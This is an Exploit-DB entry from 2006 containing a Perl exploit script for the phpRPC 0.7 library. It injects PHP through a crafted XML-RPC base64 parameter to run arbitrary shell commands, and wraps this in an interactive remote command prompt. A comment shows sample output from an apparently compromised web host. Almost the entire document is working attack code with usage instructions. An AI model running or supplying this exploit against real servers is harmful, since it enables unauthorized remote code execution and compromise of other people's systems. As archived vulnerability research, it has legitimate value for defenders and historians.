phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (1)

EDB-ID:

1542


Author:

LorD

Type:

webapps


Platform:

PHP

Date:

2006-03-01


#!/usr/bin/perl
#
#root@host [~]# perl rpc.pl phprpc.sourceforge.net /modules/phpRPC/server.php
#--== IHS IRAN HOMELAND SECURITY ==--
#
#phpRPC <= 0.7 commands execute exploit by LorD (http://www.ihs.ir)
#
#[IRAN HOMELAND SECURITY]$ uname -a;id;pwd
#Linux sc8-pr-web9.sourceforge.net 2.6.10-1.771_FC2smp #1 SMP Mon Mar 28 01:10:51 EST 2005 i686 i686 i386 GNU/Linux
#uid=65534(nfsnobody) gid=65534(nfsnobody) groups=65534(nfsnobody)
#/home/groups/p/ph/phprpc/htdocs/modules/phpRPC
#_end_
#[IRAN HOMELAND SECURITY]$
#
#
# 0rginal Advisory : http://www.gulftech.org/?node=research&article_id=00105-02262006
# Greetz to NT and C0d3r
use IO::Socket;
print "--== IHS IRAN HOMELAND SECURITY ==--\n\n";
print "phpRPC <= 0.7 commands execute exploit by LorD (http://www.ihs.ir)\n\n";
if ($ARGV[0] && $ARGV[1])
{
	$host = $ARGV[0];
	$xml = $ARGV[1];
	$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host",
	PeerPort => "80") || die "connecterror\n";
	while (1) {
		print '[IRAN HOMELAND SECURITY]$ ';
		$cmd = <STDIN>;
		chop($cmd);
		last if ($cmd eq 'exit');
		$xmldata = "<?xml version=\"1.0\"?><methodCall><methodName>test.method</methodName><params><param><value><base64>'));echo '_begin_\n';echo `".$cmd."`;echo '_end_\n';exit;</param></params></methodCall>";
		print $sock "POST ".$xml." HTTP/1.1\n";
		print $sock "Host: ".$host."\n";
		print $sock "Content-Type: text/xml\n";
		print $sock "Content-Length:".length($xmldata)."\n\n".$xmldata;
		$good=0;
		while ($ans = <$sock>)
		{
			if ($good == 1) { print "$ans"; }
			last if ($ans =~ /^_end_/);
			if ($ans =~ /^_begin_/) { $good = 1; }
		}
		if ($good==0) {print "Exploit Failed\n";exit();}
	}
}
else {
	print "Usage: perl rpc.pl host path_to_phpRPC\n\n";
	print "Example: perl rpc.pl target.com /server.php\n";
	exit;
}

# milw0rm.com [2006-03-01]